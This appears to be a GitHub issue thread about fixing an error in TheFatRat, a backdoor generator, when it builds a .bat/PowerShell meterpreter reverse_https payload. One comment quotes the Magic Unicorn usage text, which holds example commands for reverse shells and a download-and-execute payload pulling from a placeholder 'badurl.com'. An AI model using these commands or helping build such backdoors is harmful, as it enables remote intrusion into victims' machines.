### ISSUE TITLE
Error creating bat backdoor

### ISSUE THREAD

**Issue by gagep451** [screetsec/TheFatRat#527]
getting this error when creating a back door.

cat: powershell_attack.txt: No such file or directory

rm: cannot remove 'unicorn.rc': No such file or directory

mv: cannot stat 'powershell_attack.txt': No such file or directory

creating a bat file + powershell
using windows/meterpreter/reverse_https

**Comment by peterpt** [comment]
go to fatrat directory and write : 
cd tools 
python trusted_2_6.py


and tell me what happens

**Comment by gagep451** [comment]
-------------------- Magic Unicorn Attack Vector v2.6 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec exe=test.exe url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro
HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Help Menu: python unicorn.py --help

**Comment by peterpt** [comment]
the problem was your local host or port values .
if you choose reverse https then it must be an https port , and those ports are 443 or 8443 and you probably used a different other port .

**Comment by AbhinayGidugu** [comment]
Did anyone got solution for this..pls help me.i got same error.

**Comment by Nex026** [comment]
Please, HOW CAN WE FIX THIS ;)

**Comment by DeepDash0x90** [comment]
the problem was due to the static variable declare on "fatrat" code.

`dave='python tools/trusted_2_6.py'`

On my distribution kali the last version i don't have anymore python command.
I have python2 or python3, the fact is the script trusted_2_6.py use a specific command "reduce".
In Python 2, reduce() was a built-in function. However, in Python 3, it is moved to functools module.

So, i just correct the line :
`dave='python2 tools/trusted_2_6.py'`

restart the fatrat script and that will be done.

Enjoy.

**Comment by rodhy974** [comment]
thanks a lot, it works also for me

**Comment by dang0403** [comment]
can you teach me how to changes that lines? @GroteEland

**Comment by nx-0x6e78** [comment]
> can you teach me how to changes that lines? @GroteEland

try using sudo nano "filename"

**Comment by HasanKhannn** [comment]
@GroteEland plz tell how to change the code

**Comment by 247network** [comment]
To modify the file:

1 - Install nano 
sudo apt install nano

2 - Assuming TFR is located in your desktop
nano /home/kali/Desktop/TheFatRat/fatrat

3 - Edit the file and when you're ready
hit CTRL + x 
hit y
hit Enter

**Comment by itaym2910** [comment]
hi, I did all that you said and still keep getting the same error please help.
